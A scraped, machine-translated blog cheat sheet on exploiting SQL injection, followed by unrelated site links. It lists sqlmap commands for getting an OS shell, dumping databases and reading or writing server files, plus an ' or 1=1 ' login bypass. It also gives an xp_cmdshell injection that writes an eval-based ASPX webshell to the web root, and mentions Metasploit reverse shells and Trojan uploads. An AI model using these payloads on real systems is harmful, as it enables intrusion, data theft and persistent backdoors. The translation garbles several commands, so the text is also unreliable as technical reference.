sql injection exploit vulnerabilities

Others 2020-03-29 21:13:42 views: null

Exploitation of a vulnerability (sqlmap)

Database privilege escalation

1. The shell can be obtained directly, you may obtain system privileges
sqlmap -d "mysql: // root: root @ ip / Database" - OS-shell
2.Mysql can use the sql-shell and then mention the right udf

Universal password

' or 1=1 '

Database dump

-u injection point detecting
--current-db view the current database
--current-user to view the current user
--tables
--columns
--dump

Read and write files (need to have read and write access, and secure_file_priv related)

--file-read to read the file
--file-write local files can be uploaded (parameters connected to the local shell)
--file-dest written to the target file (parameters connected to the invasion site address)

Get webshell conditions

1.php + MySQL website for webshell type conditions
(1) MySQL root account privileges, account also configure the connection to MySQL root account, the root account has not
prepared root privileges can.
(2) GPC closed configuration, able to use single quotes
(3) has an absolute path of the site, and may be provided with permission to write a file folder
(4) is not configured secure-file-priv property
2.MSSQL + ASP / Asp. net type website for webshell condition
(1) is a database user sa
(2) the ability to create xp_cmdshell, although the sa account can also be connected in some cases, but can not use
xp_cmdshell. (3) know the real path
(4) can be generated by the echo command shell
injection points written directly
; Exec master..xp_cmdshell 'echo ^ <% @ Page
Language = "Jscript"% > <% the eval (Request.Item [ "Pass "]," the unsafe ");% ^>>
C: \ the WWW \ 233.aspx '; -
the command line:
echo ^ <% @ Page Language =" Jscript "% > <% the eval (Request.Item [" pass "],"

sqlmap get webshell

.-- os-shell 1
(1) directly connected to the database (can be set to allow external users to log)
(2) to know the absolute path, and the user has write permissions
2.msf rebound shell (writable permissions and path)
upload Trojan file and bounced shell
3. shell uploaded
by sqlmap obtain account and password to upload shell background

Guess you like

Origin www.cnblogs.com/lyxsalyd/p/12594697.html
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com